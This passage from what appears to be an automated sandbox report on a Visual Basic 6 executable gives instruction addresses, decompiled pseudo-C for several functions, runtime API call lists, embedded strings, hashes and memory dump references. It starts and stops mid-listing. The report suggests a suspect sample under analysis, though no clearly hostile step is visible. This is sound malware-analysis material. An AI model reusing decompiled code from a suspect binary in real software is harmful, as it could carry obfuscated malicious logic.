0x00401bf4
0x00401bf6
0x00401bf8
0x00401bfa
0x00401bfc
0x00401bfe
0x00401c00
0x00401c02
0x00401c04
0x00401c06
0x00401c08
0x00401c0a
0x00401c0c
0x00401c0e
0x00401c10
0x00401c12
0x00401c14
0x00401c16
0x00401c18
0x00401c1a
0x00401c1c
0x00401c1e
0x00401c20
0x00401c22
0x00401c24
0x00401c26
0x00401c28
0x00401c2a
0x00401c2c
0x00401c2e
0x00401c30
0x00401c32
0x00401c34
0x00401c36
0x00401c38
0x00401c3a
0x00401c3c
0x00401c3e
0x00401c40
0x00401c42
0x00401c44
0x00401c46
0x00401c48
0x00401c4a
0x00401c4c
0x00401c4e
0x00401c50
0x00401c52
0x00401c54
0x00401c56
0x00401c58
0x00401c5a
0x00401c5c
0x00401c5e
0x00401c60
0x00401c62
0x00401c64
0x00401c66
0x00401c68
0x00401c6a
0x00401c6c
0x00401c6e
0x00401c70
0x00401c72
0x00401c74
0x00401c76
0x00401c78
0x00401c7a
0x00401c7c
0x00401c7e
0x00401c80
0x00401c82
0x00401c84
0x00401c86
0x00401c88
0x00401c8a
0x00401c8c
0x00401c8e
0x00401c90
0x00401c92
0x00401c94
0x00401c96
0x00401c98
0x00401c9a
0x00401c9c
0x00401c9e
0x00401ca0
0x00401ca2
0x00401ca4
0x00401ca6
0x00401ca8
0x00401caa
0x00401cab
0x00401cab
0x00401cad
0x00401caf
0x00401cb1
0x00401cb3
0x00401cb5
0x00401cb7
0x00401cb9
0x00401cbb
0x00401cbd
0x00401cbf
0x00401cc1
0x00401cc3
0x00401cc5
0x00401cc7
0x00401cc9
0x00401ccb
0x00401ccd
0x00401ccf
0x00401cd1
0x00401cd3
0x00401cd5
0x00401cd7
0x00401cdd
0x00401cdf
0x00401ce2
0x00401ce4
0x00401cea
0x00401ced
0x00401cee
0x00401cf1
0x00401cf1
0x00401cf4
0x00401cf6
0x00401cf8
0x00401cfa
0x00401cfc
0x00401cfe
0x00401d00
0x00401d02
0x00401d04
0x00401d06
0x00401d09
0x00401d0b
0x00401d0d
0x00401d0f
0x00401d11
0x00401d13
0x00401d15
0x00401d17
0x00401d19
0x00401d1b
0x00401d1d
0x00401d1f
0x00401d22
0x00401d24
0x00401d26
0x00401d2a
0x00401d2b
0x00401d2f
0x00401d30
0x00401d31
0x00401d33
0x00401d3a
0x00401d3d
0x00401d3e
0x00401d41
0x00401d43
0x00401d45
0x00401d47
0x00401d49
0x00401d4b
0x00401d4d
0x00401d4f
0x00401d51
0x00401d53
0x00401d55
0x00401d57
0x00401d59
0x00401d5b
0x00401d5d
0x00401d5f
0x00401d61
0x00401d63
0x00401d65
0x00401d67
0x00401d69
0x00401d6b
0x00401d6d
0x00401d6f
0x00401d72
0x00401d74
0x00401d76
0x00401d78
0x00401d7c
0x00401d7d
0x00401d7f
0x00401d82
0x00401d85
0x00401d8d
0x00401d8f
0x00401d90
0x00401d92
0x00401d95
0x00401d97
0x00401d99
0x00401d9b
0x00401d9d
0x00401d9f
0x00401da1
0x00401da3
0x00401da5
0x00401da7
0x00401da9
0x00401dab
0x00401dad
0x00401daf
0x00401db1
0x00401db3
0x00401db5
0x00401db7
0x00401db9
0x00401dbb
0x00401dbd
0x00401dbf
0x00401dc5
0x00401dc7
0x00401dcb
0x00401dcd
0x00401dcf
0x00401dd2
0x00401dd4

APIs

#100.MSVBVM60(VB5!6&*), ref: 004017ED

Strings

VB5!6&*, xrefs: 004017E8, 00401824

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: bb75844f231c09e5f9db6ae4fa22765c1f3d0e783e17a8a154a708f85d142821
Instruction ID: f677ca67b01cba183c419f1f7577474189a9f2be167cee272a84728fb8332916
Opcode Fuzzy Hash: bb75844f231c09e5f9db6ae4fa22765c1f3d0e783e17a8a154a708f85d142821
Instruction Fuzzy Hash: 859122A244E3C18FC7139BB08EB51917FB1AE1332171E05EBC4C1DE1A3D26D5A5AC72A

Uniqueness

Uniqueness Score: -1.00%

Function 00404D18, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f098b499f2a8a4cacf269aed91093e76c781f0c658be3b8d3d344252fabceab5
Instruction ID: e5f698b73f2274668252cd2638d5a5b231fbe89bfee18672b17a58a8b3e80841
Opcode Fuzzy Hash: f098b499f2a8a4cacf269aed91093e76c781f0c658be3b8d3d344252fabceab5
Instruction Fuzzy Hash: 18B012A4394541FEE2105A647C0162511C0DAC43903A00C33F501E61D0DA3CCE00412D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042135A, Relevance: 103.7, APIs: 56, Strings: 3, Instructions: 459
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0042135A(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				short _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				char _v52;
				char _v56;
				signed int _v64;
				char _v72;
				signed int _v80;
				char _v88;
				signed int _v96;
				char _v104;
				signed int _v112;
				char _v120;
				char _v124;
				signed int _v132;
				char _v140;
				signed int _v148;
				char _v156;
				intOrPtr _v164;
				intOrPtr _v172;
				intOrPtr _v180;
				intOrPtr _v188;
				intOrPtr _v196;
				char _v204;
				short _v208;
				signed int _v212;
				signed int _v216;
				void* _v220;
				signed int _v224;
				signed int _v232;
				intOrPtr* _v236;
				signed int _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				char* _t225;
				signed int _t230;
				signed int _t236;
				signed int _t237;
				signed int _t245;
				signed int _t250;
				signed int _t261;
				signed int _t266;
				signed int _t272;
				signed int _t277;
				short _t278;
				char* _t279;
				signed int _t283;
				signed int _t287;
				signed int _t295;
				intOrPtr _t351;
				intOrPtr* _t352;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t351;
				L00401530();
				_v12 = _t351;
				_v8 = 0x4014d8;
				L00401734();
				_v64 = _v64 & 0x00000000;
				_v72 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v72);
				L00401608();
				L00401752();
				L00401794();
				_push(0);
				_push(3);
				_push(1);
				_push(0);
				_t225 =  &_v124;
				_push(_t225);
				_push(0x10);
				_push(0x880);
				L0040173A();
				_t352 = _t351 + 0x1c;
				_v132 = 2;
				_v140 = 2;
				_push(0);
				_push(_v124);
				L0040172E();
				L00401764();
				_v148 = 3;
				_v156 = 2;
				_push(1);
				_push(_v124);
				L0040172E();
				L00401764();
				_v164 = 3;
				_v172 = 2;
				_push(2);
				_push(_v124);
				L0040172E();
				L00401764();
				_v180 = 4;
				_v188 = 2;
				_push(3);
				_push(_v124);
				L0040172E();
				L00401764();
				_push( &_v124);
				asm("fld1");
				_push(_t225);
				 *_t352 = __fp0;
				_push( &_v72);
				L00401602();
				_push( &_v124);
				_push(0);
				L004015FC();
				_v196 = 2;
				_v204 = 0x8002;
				_push( &_v72);
				_t230 =  &_v204;
				_push(_t230);
				L00401704();
				_v212 = _t230;
				L00401794();
				if(_v212 != 0) {
					if( *0x425698 != 0) {
						_v236 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v236 = 0x425698;
					}
					_v212 =  *_v236;
					_t261 =  *((intOrPtr*)( *_v212 + 0x14))(_v212,  &_v52);
					asm("fclex");
					_v216 = _t261;
					if(_v216 >= 0) {
						_v240 = _v240 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v212);
						_push(_v216);
						L004017B8();
						_v240 = _t261;
					}
					_v220 = _v52;
					_v132 = 0x80020004;
					_v140 = 0xa;
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t266 =  *((intOrPtr*)( *_v220 + 0x13c))(_v220, L"Sorthavsrejser", 0x10);
					asm("fclex");
					_v224 = _t266;
					if(_v224 >= 0) {
						_v244 = _v244 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4050c0);
						_push(_v220);
						_push(_v224);
						L004017B8();
						_v244 = _t266;
					}
					L0040178E();
					if( *0x425698 != 0) {
						_v248 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v248 = 0x425698;
					}
					_v212 =  *_v248;
					_t272 =  *((intOrPtr*)( *_v212 + 0x14))(_v212,  &_v52);
					asm("fclex");
					_v216 = _t272;
					if(_v216 >= 0) {
						_v252 = _v252 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v212);
						_push(_v216);
						L004017B8();
						_v252 = _t272;
					}
					_v220 = _v52;
					_t277 =  *((intOrPtr*)( *_v220 + 0x140))(_v220,  &_v208);
					asm("fclex");
					_v224 = _t277;
					if(_v224 >= 0) {
						_v256 = _v256 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050c0);
						_push(_v220);
						_push(_v224);
						L004017B8();
						_v256 = _t277;
					}
					_t278 = _v208;
					_v36 = _t278;
					L0040178E();
					L00401626();
					_push(_t278);
					_t279 =  &_v56;
					_push(_t279);
					L004017C4();
					_v220 = _t279;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					if( *0x425010 != 0) {
						_v260 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v260 = 0x425010;
					}
					_t283 =  &_v52;
					L004017C4();
					_v212 = _t283;
					_t287 =  *((intOrPtr*)( *_v212 + 0xa0))(_v212,  &_v208, _t283,  *((intOrPtr*)( *((intOrPtr*)( *_v260)) + 0x30c))( *_v260));
					asm("fclex");
					_v216 = _t287;
					if(_v216 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x405050);
						_push(_v212);
						_push(_v216);
						L004017B8();
						_v264 = _t287;
					}
					_t295 =  *((intOrPtr*)( *_v220 + 0x44))(_v220, _v208,  &_v72,  &_v88,  &_v104,  &_v120);
					asm("fclex");
					_v224 = _t295;
					if(_v224 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40627c);
						_push(_v220);
						_push(_v224);
						L004017B8();
						_v268 = _t295;
					}
					_push( &_v56);
					_push( &_v52);
					_push(2);
					L004017A6();
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push(4);
					L004017A0();
					_t352 = _t352 + 0x20;
				}
				L00401734();
				_v132 =  &_v32;
				_v140 = 0x4008;
				_push(2);
				_push( &_v140);
				_push( &_v72);
				L004015F6();
				_v148 = 0x406278;
				_v156 = 0x8008;
				_push( &_v72);
				_t236 =  &_v156;
				_push(_t236);
				L00401704();
				_v212 = _t236;
				L00401794();
				_t237 = _v212;
				if(_t237 != 0) {
					_push(L"18:18:18");
					_push( &_v72);
					L004015F0();
					_push( &_v72);
					L00401728();
					L00401752();
					L00401794();
					if( *0x425698 != 0) {
						_v272 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v272 = 0x425698;
					}
					_v212 =  *_v272;
					_t245 =  *((intOrPtr*)( *_v212 + 0x14))(_v212,  &_v52);
					asm("fclex");
					_v216 = _t245;
					if(_v216 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v212);
						_push(_v216);
						L004017B8();
						_v276 = _t245;
					}
					_v220 = _v52;
					_t250 =  *((intOrPtr*)( *_v220 + 0x60))(_v220,  &_v48);
					asm("fclex");
					_v224 = _t250;
					if(_v224 >= 0) {
						_v280 = _v280 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x4050c0);
						_push(_v220);
						_push(_v224);
						L004017B8();
						_v280 = _t250;
					}
					_v232 = _v48;
					_v48 = _v48 & 0x00000000;
					L00401752();
					L0040178E();
					_v148 = 0x80020004;
					_v156 = 0xa;
					_v132 = 0x80020004;
					_v140 = 0xa;
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t237 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10);
					asm("fclex");
					_v212 = _t237;
					if(_v212 >= 0) {
						_v284 = _v284 & 0x00000000;
					} else {
						_push(0x2b0);
						_push(0x404b0c);
						_push(_a4);
						_push(_v212);
						L004017B8();
						_v284 = _t237;
					}
				}
				asm("wait");
				_push(0x421b23);
				L00401740();
				L00401740();
				L00401740();
				L00401740();
				L00401740();
				return _t237;
			}

0x0042135f
0x0042136a
0x0042136b
0x00421377
0x0042137f
0x00421382
0x0042138f
0x00421394
0x00421398
0x0042139f
0x004213a1
0x004213a3
0x004213a5
0x004213aa
0x004213ab
0x004213b5
0x004213bd
0x004213c2
0x004213c4
0x004213c6
0x004213c8
0x004213ca
0x004213cd
0x004213ce
0x004213d0
0x004213d5
0x004213da
0x004213dd
0x004213e4
0x004213f4
0x004213f6
0x004213f9
0x00421402
0x00421407
0x00421411
0x00421421
0x00421423
0x00421426
0x0042142f
0x00421434
0x0042143e
0x0042144e
0x00421450
0x00421453
0x0042145c
0x00421461
0x0042146b
0x0042147b
0x0042147d
0x00421480
0x00421489
0x00421491
0x00421492
0x00421494
0x00421495
0x0042149b
0x0042149c
0x004214a4
0x004214a5
0x004214a7
0x004214ac
0x004214b6
0x004214c3
0x004214c4
0x004214ca
0x004214cb
0x004214d0
0x004214da
0x004214e8
0x004214f5
0x00421512
0x004214f7
0x004214f7
0x004214fc
0x00421501
0x00421506
0x00421506
0x00421524
0x0042153c
0x0042153f
0x00421541
0x0042154e
0x00421570
0x00421550
0x00421550
0x00421552
0x00421557
0x0042155d
0x00421563
0x00421568
0x00421568
0x0042157a
0x00421580
0x00421587
0x00421594
0x004215a1
0x004215a2
0x004215a3
0x004215a4
0x004215b8
0x004215be
0x004215c0
0x004215cd
0x004215f2
0x004215cf
0x004215cf
0x004215d4
0x004215d9
0x004215df
0x004215e5
0x004215ea
0x004215ea
0x004215fc
0x00421608
0x00421625
0x0042160a
0x0042160a
0x0042160f
0x00421614
0x00421619
0x00421619
0x00421637
0x0042164f
0x00421652
0x00421654
0x00421661
0x00421683
0x00421663
0x00421663
0x00421665
0x0042166a
0x00421670
0x00421676
0x0042167b
0x0042167b
0x0042168d
0x004216a8
0x004216ae
0x004216b0
0x004216bd
0x004216e2
0x004216bf
0x004216bf
0x004216c4
0x004216c9
0x004216cf
0x004216d5
0x004216da
0x004216da
0x004216e9
0x004216f0
0x004216f7
0x004216fc
0x00421701
0x00421702
0x00421705
0x00421706
0x0042170b
0x00421711
0x00421718
0x0042171f
0x00421726
0x0042172d
0x00421734
0x0042173b
0x00421742
0x00421750
0x0042176d
0x00421752
0x00421752
0x00421757
0x0042175c
0x00421761
0x00421761
0x00421791
0x00421795
0x0042179a
0x004217b5
0x004217bb
0x004217bd
0x004217ca
0x004217ef
0x004217cc
0x004217cc
0x004217d1
0x004217d6
0x004217dc
0x004217e2
0x004217e7
0x004217e7
0x0042181c
0x0042181f
0x00421821
0x0042182e
0x00421850
0x00421830
0x00421830
0x00421832
0x00421837
0x0042183d
0x00421843
0x00421848
0x00421848
0x0042185a
0x0042185e
0x0042185f
0x00421861
0x0042186c
0x00421870
0x00421874
0x00421878
0x00421879
0x0042187b
0x00421880
0x00421880
0x0042188b
0x00421893
0x00421896
0x004218a0
0x004218a8
0x004218ac
0x004218ad
0x004218b2
0x004218bc
0x004218c9
0x004218ca
0x004218d0
0x004218d1
0x004218d6
0x004218e0
0x004218e5
0x004218ee
0x004218f4
0x004218fc
0x004218fd
0x00421905
0x00421906
0x00421910
0x00421918
0x00421924
0x00421941
0x00421926
0x00421926
0x0042192b
0x00421930
0x00421935
0x00421935
0x00421953
0x0042196b
0x0042196e
0x00421970
0x0042197d
0x0042199f
0x0042197f
0x0042197f
0x00421981
0x00421986
0x0042198c
0x00421992
0x00421997
0x00421997
0x004219a9
0x004219c1
0x004219c4
0x004219c6
0x004219d3
0x004219f5
0x004219d5
0x004219d5
0x004219d7
0x004219dc
0x004219e2
0x004219e8
0x004219ed
0x004219ed
0x004219ff
0x00421a05
0x00421a12
0x00421a1a
0x00421a1f
0x00421a29
0x00421a33
0x00421a3a
0x00421a47
0x00421a54
0x00421a55
0x00421a56
0x00421a57
0x00421a5b
0x00421a68
0x00421a69
0x00421a6a
0x00421a6b
0x00421a74
0x00421a7a
0x00421a7c
0x00421a89
0x00421aab
0x00421a8b
0x00421a8b
0x00421a90
0x00421a95
0x00421a98
0x00421a9e
0x00421aa3
0x00421aa3
0x00421a89
0x00421ab2
0x00421ab3
0x00421afd
0x00421b05
0x00421b0d
0x00421b15
0x00421b1d
0x00421b22

APIs

__vbaChkstk.MSVBVM60(?,00401536), ref: 00421377
__vbaStrCopy.MSVBVM60(?,?,?,?,00401536), ref: 0042138F
#704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004213AB
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004213B5
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 004213BD
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 004213D5
__vbaDerefAry1.MSVBVM60(?,00000000), ref: 004213F9
__vbaVarMove.MSVBVM60(?,00000000), ref: 00421402
__vbaDerefAry1.MSVBVM60(?,00000001,?,?,?,00000000), ref: 00421426
__vbaVarMove.MSVBVM60(?,00000001,?,?,?,00000000), ref: 0042142F
__vbaDerefAry1.MSVBVM60(?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 00421453
__vbaVarMove.MSVBVM60(?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 0042145C
__vbaDerefAry1.MSVBVM60(?,00000003,?,?,?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 00421480
__vbaVarMove.MSVBVM60(?,00000003,?,?,?,00000002,?,?,?,00000001,?,?,?,00000000), ref: 00421489
#665.MSVBVM60(?,?,?,?,00000003,?,?,?,00000002,?,?,?,00000001,?,?,?), ref: 0042149C
__vbaErase.MSVBVM60(00000000,?,?,?,?,?,00000003,?,?,?,00000002,?,?,?,00000001), ref: 004214A7
__vbaVarTstNe.MSVBVM60(00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002,?,?,?), ref: 004214CB
__vbaFreeVar.MSVBVM60(00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002,?,?,?), ref: 004214DA
__vbaNew2.MSVBVM60(00405090,00425698,00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002), ref: 00421501
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421563
__vbaChkstk.MSVBVM60(?,?,?,00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002), ref: 00421594
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,0000013C,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 004215E5
__vbaFreeObj.MSVBVM60(?,?,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 004215FC
__vbaNew2.MSVBVM60(00405090,00425698,?,?,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421614
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014,?,?,?,?,?,00008002,?,00000000,?,?,?,?), ref: 00421676
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000140,?,?,?,?,?,?,?,00008002,?,00000000,?,?), ref: 004216D5
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 004216F7
#685.MSVBVM60(?,?,?,?,?,?,?,00008002,?,00000000,?,?,?,?,?,00000003), ref: 004216FC
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00008002,?,00000000,?,?,?,?), ref: 00421706
__vbaNew2.MSVBVM60(00404370,00425010,?,00000000,?,?,?,?,?,?,?,00008002,?,00000000,?,?), ref: 0042175C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00008002,?,00000000,?,?,?,?), ref: 00421795
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405050,000000A0,?,?,?,?,?,?,?,00008002,?,00000000,?,?), ref: 004217E2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040627C,00000044,?,?,?,?,?,?,?,?,?,?,00008002,?), ref: 00421843
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,00008002,?,00000000), ref: 00421861
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042187B
__vbaStrCopy.MSVBVM60(00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002,?,?,?), ref: 0042188B
#515.MSVBVM60(?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003,?,?,?,00000002), ref: 004218AD
__vbaVarTstNe.MSVBVM60(00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 004218D1
__vbaFreeVar.MSVBVM60(00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 004218E0
#541.MSVBVM60(?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 004218FD
__vbaStrVarMove.MSVBVM60(?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?), ref: 00421906
__vbaStrMove.MSVBVM60(?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?), ref: 00421910
__vbaFreeVar.MSVBVM60(?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?), ref: 00421918
__vbaNew2.MSVBVM60(00405090,00425698,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?), ref: 00421930
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405080,00000014,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002), ref: 00421992
__vbaHresultCheckObj.MSVBVM60(00000000,?,004050C0,00000060,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002), ref: 004219E8
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?), ref: 00421A12
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?), ref: 00421A1A
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?), ref: 00421A47
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,18:18:18,00008008,?,?,00004008,00000002,00008002,?), ref: 00421A5B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00404B0C,000002B0,?,?,?,?,?,?,?,?,18:18:18,00008008,?,?), ref: 00421A9E
__vbaFreeStr.MSVBVM60(00421B23,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421AFD
__vbaFreeStr.MSVBVM60(00421B23,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B05
__vbaFreeStr.MSVBVM60(00421B23,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B0D
__vbaFreeStr.MSVBVM60(00421B23,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B15
__vbaFreeStr.MSVBVM60(00421B23,00008008,?,?,00004008,00000002,00008002,?,00000000,?,?,?,?,?,00000003), ref: 00421B1D

Strings

18:18:18, xrefs: 004218F4
Sorthavsrejser, xrefs: 004215A5
var, xrefs: 00421883

Memory Dump Source

Source File: 00000000.00000002.476026542.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.476020961.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476059663.0000000000425000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476065318.0000000000428000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476080679.000000000042A000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$Ary1ChkstkDerefNew2$CopyList$#515#541#665#685#704EraseRedim
String ID: 18:18:18$Sorthavsrejser$var
API String ID: 3646068646-768722070
Opcode ID: 3d1063eff08390ef0dd57f78d6de11afb7e5de9a1ff43d6c3ce6064a6c6945b9
Instruction ID: 005c028ce7668fca20c85a4c2c14f844af409524fd95bca568d70d1c0beff930
Opcode Fuzzy Hash: 3d1063eff08390ef0dd57f78d6de11afb7e5de9a1ff43d6c3ce6064a6c6945b9
Instruction Fuzzy Hash: DF220971A00228AFDB21EF91DC45FDDB7B4BF04304F5041AAE109B72A1DB795A89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC2F, Relevance: 80.9, APIs: 44, Strings: 2, Instructions: 374
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041FC2F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				void* _v32;
				short _v36;
				short _v40;
				intOrPtr _v44;
				short _v48;
				char _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				char _v112;
				intOrPtr _v120;
				intOrPtr _v128;
				char* _v136;
				char _v144;
				void* _v148;
				void* _v152;
				signed int _v156;
				void* _v160;
				signed int _v164;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				signed int _v224;
				short _t184;
				char* _t190;
				signed int _t196;
				signed int _t201;
				signed int _t208;
				signed int _t213;
				signed int _t221;
				signed int _t226;
				char* _t231;
				signed int _t235;
				signed int _t245;
				intOrPtr _t281;
				signed int _t291;

				_push(0x401536);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t281;
				L00401530();
				_v12 = _t281;
				_v8 = 0x401490;
				_v68 = 1;
				_v76 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v76);
				L00401650();
				L00401752();
				L00401794();
				_v68 = 0xe;
				_v76 = 2;
				_push( &_v76);
				_push( &_v92);
				L0040164A();
				_v136 = L"Out of string space";
				_v144 = 0x8008;
				_push( &_v92);
				_t184 =  &_v144;
				_push(_t184);
				L00401704();
				_v152 = _t184;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L004017A0();
				if(_v152 != 0) {
					_v68 = 1;
					_v76 = 2;
					_push(0);
					_push( &_v76);
					L00401644();
					L00401752();
					L00401794();
					if( *0x425698 != 0) {
						_v176 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v176 = 0x425698;
					}
					_v152 =  *_v176;
					_t221 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v60);
					asm("fclex");
					_v156 = _t221;
					if(_v156 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v152);
						_push(_v156);
						L004017B8();
						_v180 = _t221;
					}
					_v160 = _v60;
					_t226 =  *((intOrPtr*)( *_v160 + 0x140))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t226;
					if(_v164 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x4050c0);
						_push(_v160);
						_push(_v164);
						L004017B8();
						_v184 = _t226;
					}
					_v36 = _v148;
					L0040178E();
					if( *0x425010 != 0) {
						_v188 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v188 = 0x425010;
					}
					_t231 =  &_v60;
					L004017C4();
					_v152 = _t231;
					_t235 =  *((intOrPtr*)( *_v152 + 0x140))(_v152,  &_v56, _t231,  *((intOrPtr*)( *((intOrPtr*)( *_v188)) + 0x30c))( *_v188));
					asm("fclex");
					_v156 = _t235;
					if(_v156 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x405050);
						_push(_v152);
						_push(_v156);
						L004017B8();
						_v192 = _t235;
